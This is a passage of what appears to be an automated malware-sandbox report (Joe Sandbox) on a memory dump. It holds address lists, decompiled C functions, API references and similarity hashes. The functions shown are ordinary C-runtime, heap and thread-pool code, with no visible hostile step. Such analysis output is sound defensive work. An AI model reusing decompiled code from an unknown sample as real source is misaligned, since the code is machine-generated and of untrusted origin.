0x0134a94f
0x0134a957
0x0134a961
0x0134a880
0x0134a884
0x0134a8b4
0x0134a8b4
0x0134a8b7
0x0134a96a
0x0134a96a
0x0134a96a
0x00000000
0x0134a8bd
0x0134a8bd
0x0134a8c0
0x00000000
0x0134a8c6
0x0134a8c7
0x00000000
0x0134a8cc
0x0134a8c0
0x0134a8b7
0x0134a8b2
0x0134a86c
0x0134a86f
0x0134a96c
0x0134a96c
0x0134a96d
0x0134a96e
0x0134a96f
0x0134a970
0x0134a971
0x0134a976
0x0134a97a
0x0134a97c
0x0134a97d
0x0134a981
0x0134a991
0x0134a992
0x0134a99b
0x0134a9a3
0x0134a9a8
0x0134a9ab
0x0134a9ad
0x0134a9b9
0x0134a9c3
0x0134a9c6
0x0134a9c7
0x0134a9c9
0x0134a9fa
0x0134a9fb
0x0134aa06
0x0134a9cb
0x0134a9d5
0x0134a9da
0x0134a9dd
0x0134a9df
0x0134a9f1
0x0134a9f8
0x00000000
0x0134a9e1
0x0134a9e1
0x0134a9e4
0x00000000
0x0134a9e6
0x0134a9e6
0x0134a9e9
0x00000000
0x0134a9eb
0x00000000
0x0134a9eb
0x0134a9e9
0x0134a9e4
0x0134a9df
0x0134a9af
0x0134a9af
0x0134a9b2
0x0134aa07
0x0134aa07
0x0134aa08
0x0134aa09
0x0134aa0a
0x0134aa0b
0x0134aa0c
0x0134aa11
0x0134aa14
0x0134aa1a
0x0134aa22
0x0134aa2d
0x0134aa30
0x0134aa31
0x0134aa34
0x0134aa3a
0x0134aa3e
0x0134aa42
0x0134aa43
0x0134aa49
0x0134a9b4
0x0134a9b4
0x0134a9b7
0x00000000
0x00000000
0x00000000
0x00000000
0x0134a9b7
0x0134a9b2
0x0134a983
0x0134a990
0x0134a990
0x00000000
0x00000000
0x00000000
0x0134a86f
0x0134a86a

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

_free.LIBCMT ref: 0134A8C7
_free.LIBCMT ref: 0134A8F5
_free.LIBCMT ref: 0134A938

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 0950e7d0c0ae866d2e0e4576740c8b78312e1d675f69563de274ece41a584e81
Instruction ID: e55a625acac970c1e8b395cff7d17fea6c1e563914d3ea9537bd986da6e13a5a
Opcode Fuzzy Hash: 0950e7d0c0ae866d2e0e4576740c8b78312e1d675f69563de274ece41a584e81
Instruction Fuzzy Hash: B5415D396001069FEB64DFACC881E65BBF9FF49368724066DE556C7291EB31F810DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0134A977, Relevance: 4.6, APIs: 3, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E0134A977(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				void* _t25;
				char _t30;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t46;
				void* _t48;
				void* _t54;
				void* _t55;

				_t50 = __esi;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t48 = 0;
					_t20 = E01357AF1( &_v8, 0, 0, _a8, 0x7fffffff);
					_t55 = _t54 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t50 = E01355C32(_v8, 2);
						_pop(_t39);
						__eflags = _t50;
						if(_t50 == 0) {
							L11:
							E01355C8F(_t50);
							return _t48;
						} else {
							_t24 = E01357AF1(_t48, _t50, _v8, _a8, 0xffffffff);
							_t55 = _t55 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t25 = E01354374(_t39, _t46, _a4, _t50); // executed
								_t48 = _t25;
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							E013496E7();
							asm("int3");
							E01356513();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E0134A7BD(_t36, _t48, _t50, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					return E01354374(__ecx, _t46, _a4, 0);
				}
			}

0x0134a977
0x0134a97c
0x0134a981
0x0134a991
0x0134a992
0x0134a99b
0x0134a9a3
0x0134a9a8
0x0134a9ab
0x0134a9ad
0x0134a9b9
0x0134a9c3
0x0134a9c6
0x0134a9c7
0x0134a9c9
0x0134a9fa
0x0134a9fb
0x0134aa06
0x0134a9cb
0x0134a9d5
0x0134a9da
0x0134a9dd
0x0134a9df
0x0134a9f1
0x0134a9f8
0x00000000
0x0134a9e1
0x0134a9e1
0x0134a9e4
0x00000000
0x0134a9e6
0x0134a9e6
0x0134a9e9
0x00000000
0x0134a9eb
0x00000000
0x0134a9eb
0x0134a9e9
0x0134a9e4
0x0134a9df
0x0134a9af
0x0134a9af
0x0134a9b2
0x0134aa07
0x0134aa07
0x0134aa08
0x0134aa09
0x0134aa0a
0x0134aa0b
0x0134aa0c
0x0134aa11
0x0134aa1a
0x0134aa22
0x0134aa2d
0x0134aa30
0x0134aa31
0x0134aa34
0x0134aa3a
0x0134aa3e
0x0134aa42
0x0134aa43
0x0134aa49
0x0134a9b4
0x0134a9b4
0x0134a9b7
0x00000000
0x00000000
0x00000000
0x00000000
0x0134a9b7
0x0134a9b2
0x0134a983
0x0134a990
0x0134a990

APIs

__cftoe.LIBCMT ref: 0134A9A3
__cftoe.LIBCMT ref: 0134A9D5
_free.LIBCMT ref: 0134A9FB

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: cee44a2af2c25bae6a2c7644e7e0f92bf85b6013b7b46206c0b208a7436385f0
Instruction ID: dc261a8663ba7817c0414163d3114f937dd678c9d96a99c182cfcbbc72580249
Opcode Fuzzy Hash: cee44a2af2c25bae6a2c7644e7e0f92bf85b6013b7b46206c0b208a7436385f0
Instruction Fuzzy Hash: 1821F4768041097BEF24AA9CCC41EDF3BE89F84628F604226F917D2190EB30E740DA50

Uniqueness

Uniqueness Score: -1.00%

Function 01349877, Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E01349877(void* __ecx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, long _a20, void* _a24) {
				signed int _v8;
				long _v12;
				void* _t14;
				void* _t17;
				void* _t29;
				void* _t32;

				_push(__ecx);
				_push(__ecx);
				_t34 = _a12;
				if(_a12 != 0) {
					_t14 = E01349827(__ecx, __eflags, _a12, _a16); // executed
					_v8 = _t14;
					__eflags = _t14;
					if(_t14 == 0) {
						L5:
						_t32 = 0;
						__eflags = 0;
					} else {
						_t17 = CreateThread(_a4, _a8, E0134971B, _t14, _a20,  &_v12); // executed
						_t32 = _t17;
						__eflags = _t32;
						if(_t32 != 0) {
							_t29 = _a24;
							__eflags = _t29;
							if(_t29 != 0) {
								 *_t29 = _v12;
							}
							_v8 = _v8 & 0x00000000;
						} else {
							E0134B429(GetLastError());
							goto L5;
						}
					}
					E01349799( &_v8);
					return _t32;
				} else {
					 *((intOrPtr*)(E0134B45F(_t34))) = 0x16;
					E013496BA();
					return 0;
				}
			}

0x0134987c
0x0134987d
0x0134987e
0x01349882
0x0134989f
0x013498a4
0x013498a9
0x013498ab
0x013498d9
0x013498d9
0x013498d9
0x013498ad
0x013498c0
0x013498c6
0x013498c8
0x013498ca
0x013498e8
0x013498eb
0x013498ed
0x013498f2
0x013498f2
0x013498f4
0x013498cc
0x013498d3
0x00000000
0x013498d8
0x013498ca
0x013498de
0x013498e7
0x01349884
0x01349889
0x0134988f
0x01349897
0x01349897

APIs

CreateThread.KERNELBASE ref: 013498C0
GetLastError.KERNEL32(?,?,?,012F6A62,00000000,00000000,012F8C80,00000000,00000000,?,?,?), ref: 013498CC
__dosmaperr.LIBCMT ref: 013498D3

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 32e130603e2451cf455b9c2be170762513d5636ef3992995f73aa68042352219
Instruction ID: 22d3f202c22b2014123dc606c67b132c32a2805161a6db4a5773e034cd88baa0
Opcode Fuzzy Hash: 32e130603e2451cf455b9c2be170762513d5636ef3992995f73aa68042352219
Instruction Fuzzy Hash: 72014C7250021AEFEF159FA9DC05AEF7FE9EF4826CF004158E901A6254EB71E950DB90

Uniqueness

Uniqueness Score: -1.00%

Function 013085B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E013085B0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* _a4, void* _a8) {
				void* _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				short _v48;
				void* _v52;
				long _v56;
				void* _v60;
				void* __esi;
				void* __ebp;
				signed int _t67;
				signed int _t68;
				long _t75;
				signed int _t76;
				signed int _t81;
				void* _t87;
				void** _t89;
				void* _t101;
				void* _t107;
				signed int _t110;
				void* _t111;
				signed int _t112;
				void* _t113;
				void** _t115;

				_t106 = __edi;
				_t101 = __edx;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(0x1366c2e);
				_push( *[fs:0x0]);
				_t67 =  *0x13a4018; // 0x39cca9f6
				_t68 = _t67 ^ _t112;
				_v20 = _t68;
				_push(__edi);
				_push(_t68);
				 *[fs:0x0] =  &_v16;
				_t110 = __ecx;
				_v52 = __ecx;
				_v60 = __ecx;
				_push(6);
				_t115 = _t113 - 0x24;
				_v8 = 0;
				_t89 = _t115;
				 *_t89 = 0;
				_t89[1] = 0;
				if(_a8 != 0) {
					asm("lock inc dword [eax+0x4]");
				}
				 *_t89 = _a4;
				_t89[1] = _a8;
				E01303AA0(_t110, _t101);
				 *_t110 = 0x1396af4;
				 *((char*)(_t110 + 0x18)) = 0;
				 *(_t110 + 0x2c) = 0;
				 *((intOrPtr*)(_t110 + 0x30)) = 0xf;
				 *((char*)(_t110 + 0x1c)) = 0;
				 *(_t110 + 0x38) = 0;
				 *(_t110 + 0x3c) = 0;
				 *(_t110 + 0x40) = 0;
				 *(_t110 + 0x44) = 0;
				 *((intOrPtr*)(_t110 + 0x48)) = 0x1030307;
				 *(_t110 + 0x50) = 0;
				 *(_t110 + 0x54) = 0;
				 *(_t110 + 0x58) = 0;
				 *(_t110 + 0x5c) = 0;
				 *(_t110 + 0x60) = 0;
				 *(_t110 + 0x64) = 0;
				 *(_t110 + 0x68) = 0;
				 *(_t110 + 0x7c) = 0;
				 *((intOrPtr*)(_t110 + 0x80)) = 0xf;
				 *((char*)(_t110 + 0x6c)) = 0;
				_t91 = _t110;
				_v8 = 4;
				E01308A50(_t110); // executed
				_t75 = E0130A220(); // executed
				_v56 = _t75;
				_t76 = CreateIoCompletionPort(0xffffffff, 0, 0, _t75);
				 *0x13a4b80 = _t76;
				if(_t76 == 0xffffffff || _v56 <= 0) {
					L11:
					_t107 = _a8;
					 *(_t110 + 0x84) = 0;
					 *(_t110 + 0x88) = 0;
					 *(_t110 + 0x8c) = 0;
					 *(_t110 + 0x90) = 0;
					if(_t107 != 0) {
						asm("lock xadd [edi+0x4], eax");
						if((_t76 | 0xffffffff) == 0) {
							_t81 =  *( *_t107)();
							asm("lock xadd [edi+0x8], eax");
							if((_t81 | 0xffffffff) == 0) {
								 *((intOrPtr*)( *_t107 + 4))();
							}
						}
					}
					 *[fs:0x0] = _v16;
					_pop(_t111);
					return E0132EA79(_v20 ^ _t112, _t111);
				} else {
					do {
						_t76 = E01349877(_t91, 0, 0, E0130A110, _t110, 0, 0); // executed
						_t115 =  &(_t115[6]);
						_v52 = _t76;
						if(_t76 != 0) {
							_v32 = 0;
							_v28 = 7;
							_v48 = 0;
							_v24 = 0xffffffff;
							_push(3);
							_v8 = 5;
							E012F51B0(_t87,  &_v48, _t106, _t110, "wrk");
							_t76 =  *(_t110 + 0x64);
							_v24 = _v52;
							if(_t76 ==  *(_t110 + 0x68)) {
								_push( &_v48);
								_t76 = E0130A320(_t87, _t110 + 0x60, _t76);
								_t91 = _v28;
							} else {
								asm("movups xmm0, [ebp-0x2c]");
								_t91 = 7;
								_v48 = 0;
								asm("movups [eax], xmm0");
								asm("movq xmm0, [ebp-0x1c]");
								asm("movq [eax+0x10], xmm0");
								 *(_t76 + 0x18) = _v52;
								 *(_t110 + 0x64) =  *(_t110 + 0x64) + 0x1c;
							}
							_v8 = 4;
							if(_t91 >= 8) {
								_push(2 + _t91 * 2);
								_t76 = E012F56A0(_t87, _t106, _v48);
								_t115 =  &(_t115[2]);
							}
						}
						_t56 =  &_v56;
						 *_t56 = _v56 - 1;
					} while ( *_t56 != 0);
					goto L11;
				}
			}

0x013085b0
0x013085b0
0x013085b0
0x013085b3
0x013085b5
0x013085c0
0x013085c4
0x013085c9
0x013085cb
0x013085cf
0x013085d0
0x013085d4
0x013085da
0x013085dc
0x013085df
0x013085e2
0x013085e4
0x013085e7
0x013085ee
0x013085f0
0x013085f6
0x01308602
0x01308604
0x01308604
0x0130860b
0x01308610
0x01308615
0x0130861a
0x01308620
0x01308624
0x0130862b
0x01308632
0x01308636
0x0130863d
0x01308644
0x0130864b
0x01308652
0x01308659
0x01308660
0x01308667
0x0130866e
0x01308675
0x0130867c
0x01308683
0x0130868a
0x01308691
0x0130869b
0x0130869f
0x013086a1
0x013086a5
0x013086aa
0x013086b6
0x013086b9
0x013086bf
0x013086c7
0x01308792
0x01308792
0x01308795
0x0130879f
0x013087a9
0x013087b3
0x013087bf
0x013087c4
0x013087c9
0x013087cf
0x013087d4
0x013087d9
0x013087df
0x013087df
0x013087d9
0x013087c9
0x013087e7
0x013087f0
0x013087fe
0x013086d7
0x013086d7
0x013086e5
0x013086ea
0x013086ed
0x013086f2
0x013086fa
0x01308701
0x01308708
0x0130870c
0x01308713
0x0130871d
0x01308721
0x01308726
0x0130872c
0x01308732
0x0130875f
0x01308764
0x01308769
0x01308734
0x01308734
0x0130873a
0x0130873f
0x01308746
0x01308749
0x0130874e
0x01308753
0x01308756
0x01308756
0x0130876c
0x01308773
0x0130877c
0x01308780
0x01308785
0x01308785
0x01308773
0x01308788
0x01308788
0x01308788
0x00000000
0x013086d7

APIs

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 013086B9

Strings

wrk, xrefs: 01308715

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CompletionCreatePort
String ID: wrk
API String ID: 499945625-1771439203
Opcode ID: 2141a9d4dd1d2aeecd8a59e11739ff8a9b194206aba1dbc8f1de7836de2c2386
Instruction ID: 20e8c1fa6395a9051174214ea962858e44dc80fbee1085686c1155fbf1a719bf
Opcode Fuzzy Hash: 2141a9d4dd1d2aeecd8a59e11739ff8a9b194206aba1dbc8f1de7836de2c2386
Instruction Fuzzy Hash: 3B6189B09017449FE721CF68C864B9ABBF4FF44728F10865DE5A69B7C0D7B5A508CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01349C40, Relevance: 3.0, APIs: 2, Instructions: 49
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E01349C40(long _a4) {
				void* _t4;
				void* _t13;
				long _t16;

				_pop(_t18);
				_t13 = _a4;
				if(_t13 != 0) {
					_t16 = _a4;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(__eflags <= 0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x13ab7d8, 0, _t13, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E01355057();
								if(__eflags == 0) {
									goto L6;
								} else {
									__eflags = E0135287B(__eflags, _t16);
									if(__eflags == 0) {
										goto L6;
									} else {
										continue;
									}
								}
								L14:
							}
						} else {
							L6:
							 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
							goto L7;
						}
					} else {
						E01355C8F(_t13);
						L7:
						_t4 = 0;
						__eflags = 0;
					}
				} else {
					_t4 = E013576ED(_a4);
				}
				return _t4;
				goto L14;
			}

0x01349c45
0x013568ed
0x013568f2
0x01356900
0x01356903
0x01356905
0x01356910
0x01356913
0x0135693a
0x01356944
0x0135694a
0x0135694c
0x00000000
0x00000000
0x0135692b
0x0135692d
0x00000000
0x0135692f
0x01356936
0x01356938
0x00000000
0x00000000
0x00000000
0x00000000
0x01356938
0x00000000
0x0135692d
0x01356915
0x01356915
0x0135691a
0x00000000
0x0135691a
0x01356907
0x01356908
0x01356920
0x01356920
0x01356920
0x01356920
0x013568f4
0x013568f7
0x013568fc
0x01356925
0x00000000

APIs

_free.LIBCMT ref: 01356908

Part of subcall function 013576ED: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,0135BEE9,00000220,0135F479,00013385,?,?,?,?,00000000,00000000,?,0135F479), ref: 0135771F

RtlReAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01300915,?,?,?,?,00000000,?,00000000,01365EED,000000FF), ref: 01356944

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 57a2de739c4505a607fc88ccd93fe1569b51b2d382e528cfc86ee9091ee691aa
Instruction ID: 0dfd693181ae9f928064be4a3dc557c0b767570820e9cd56370f8fd93ba8ed37
Opcode Fuzzy Hash: 57a2de739c4505a607fc88ccd93fe1569b51b2d382e528cfc86ee9091ee691aa
Instruction Fuzzy Hash: 4BF02DB220015966D7F1296E9C05FBB7F6C8FC2E7CF950125ED1556651DF31D40081A1

Uniqueness

Uniqueness Score: -1.00%

Function 01349827, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E01349827(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr* _t8;
				intOrPtr _t16;
				intOrPtr* _t18;
				intOrPtr* _t21;

				_t8 = E01355C32(1, 0x14); // executed
				_t21 = _t8;
				_t18 = 0;
				_v8 = _t21;
				E01355C8F(0);
				if(_t21 != 0) {
					_t16 = _a4;
					 *_t21 = _t16;
					 *((intOrPtr*)(_t21 + 4)) = _a8;
					_t5 = _t21 + 0xc; // 0xc
					__imp__GetModuleHandleExW(4, _t16, _t5);
					_v8 = 0;
					_t18 = _t21;
				}
				E01349799( &_v8);
				return _t18;
			}

0x01349833
0x01349838
0x0134983a
0x0134983d
0x01349840
0x0134984a
0x0134984c
0x01349852
0x01349854
0x01349857
0x0134985e
0x01349864
0x01349867
0x01349867
0x0134986c
0x01349876

APIs

Part of subcall function 01355C32: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01355B82,00000001,00000364,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355C73

_free.LIBCMT ref: 01349840

Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7

GetModuleHandleExW.KERNEL32(00000004,?,0000000C), ref: 0134985E

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Heap$AllocateErrorFreeHandleLastModule_free
String ID:
API String ID: 1586671728-0
Opcode ID: 0a1e0d30db30a56ba6e00df7f0696e27a2b7cfcb64625d96b96f4d73d0f61ba8
Instruction ID: c614125a66ca8c75e30d3f87e080cd18921786560b03bbabbc546c2c3c04decc
Opcode Fuzzy Hash: 0a1e0d30db30a56ba6e00df7f0696e27a2b7cfcb64625d96b96f4d73d0f61ba8
Instruction Fuzzy Hash: 0CF054B6A00218AFE720DF5AD805E9BBBACDFD4B14F01411ABD459B241D670AE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0131C73E, Relevance: 3.0, APIs: 2, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0131C73E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int _v0;
				signed int _v4;
				void* __ebp;
				void* _t16;
				signed int _t20;
				long _t22;
				intOrPtr _t25;
				signed int _t29;
				signed int _t30;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t36;
				long _t37;
				void* _t39;
				void* _t41;
				void* _t43;

				_t35 = __esi;
				_t34 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				if( *0x13a400c == 0) {
					__eflags = E01357FAE();
					if(__eflags != 0) {
						_push(0x16);
						E01357FF3(__edx, __eflags);
					}
					__eflags =  *0x13a40d8 & 0x00000002;
					if(( *0x13a40d8 & 0x00000002) != 0) {
						_t22 = IsProcessorFeaturePresent(0x17);
						__eflags = _t22;
						if(_t22 != 0) {
							_push(7);
							asm("int 0x29");
						}
						E0134950E(_t25, _t31, _t34, _t35, 3, 0x40000015, 1);
						_t43 = _t43 + 0xc;
					}
					E01352CDB(3);
					asm("int3");
					_t41 = _t39;
					_push(_t41);
					_push(_t35);
					_t36 = _v4;
					__eflags = _t36;
					if(_t36 == 0) {
						L12:
						_t37 = _t36 * _v0;
						__eflags = _t37;
						if(_t37 == 0) {
							_t37 = _t37 + 1;
						}
						while(1) {
							_t16 = RtlAllocateHeap( *0x13ab7d8, 8, _t37); // executed
							__eflags = _t16;
							if(_t16 != 0) {
								break;
							}
							__eflags = E01355057();
							if(__eflags == 0) {
								goto L18;
							} else {
								__eflags = E0135287B(__eflags, _t37);
								if(__eflags == 0) {
									goto L18;
								} else {
									continue;
								}
							}
							goto L19;
						}
					} else {
						_t20 = 0xffffffe0;
						__eflags = _t20 / _t36 - _v0;
						if(__eflags < 0) {
							L18:
							 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
							_t16 = 0;
							__eflags = 0;
						} else {
							goto L12;
						}
					}
					L19:
					return _t16;
				} else {
					__imp__EncodePointer(_a4);
					_t29 =  *0x13a400c; // 0xa
					_t30 = _t29 - 1;
					 *0x13a400c = _t30;
					 *((intOrPtr*)(0x13aa9a4 + _t30 * 4)) = __eax;
					return __eax;
				}
			}

0x0131c73e
0x0131c73e
0x0131c73e
0x0131c73e
0x0131c748
0x0134b477
0x0134b479
0x0134b47b
0x0134b47d
0x0134b482
0x0134b483
0x0134b48a
0x0134b48e
0x0134b494
0x0134b496
0x0134b498
0x0134b49b
0x0134b49b
0x0134b4a6
0x0134b4ab
0x0134b4ab
0x0134b4b0
0x0134b4b5
0x0134b4bb
0x01355c34
0x01355c37
0x01355c38
0x01355c3b
0x01355c3d
0x01355c4b
0x01355c4b
0x01355c4f
0x01355c51
0x01355c53
0x01355c53
0x01355c6a
0x01355c73
0x01355c79
0x01355c7b
0x00000000
0x00000000
0x01355c5b
0x01355c5d
0x00000000
0x01355c5f
0x01355c66
0x01355c68
0x00000000
0x00000000
0x00000000
0x00000000
0x01355c68
0x00000000
0x01355c5d
0x01355c3f
0x01355c43
0x01355c46
0x01355c49
0x01355c7f
0x01355c84
0x01355c8a
0x01355c8a
0x00000000
0x00000000
0x00000000
0x01355c49
0x01355c8c
0x01355c8e
0x0131c74e
0x0131c751
0x0131c757
0x0131c75d
0x0131c75e
0x0131c764
0x0131c76c
0x0131c76c

APIs

RtlEncodePointer.NTDLL(012FA63A,?,01317B02,01317B48,?,0131798F,00000000,00000000,00000000,00000004,012FA63A,00000001,(.*),00000004,?), ref: 0131C751
IsProcessorFeaturePresent.KERNEL32(00000017,01355A9C,?,?,01349740,013A18F0,0000000C), ref: 0134B48E

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

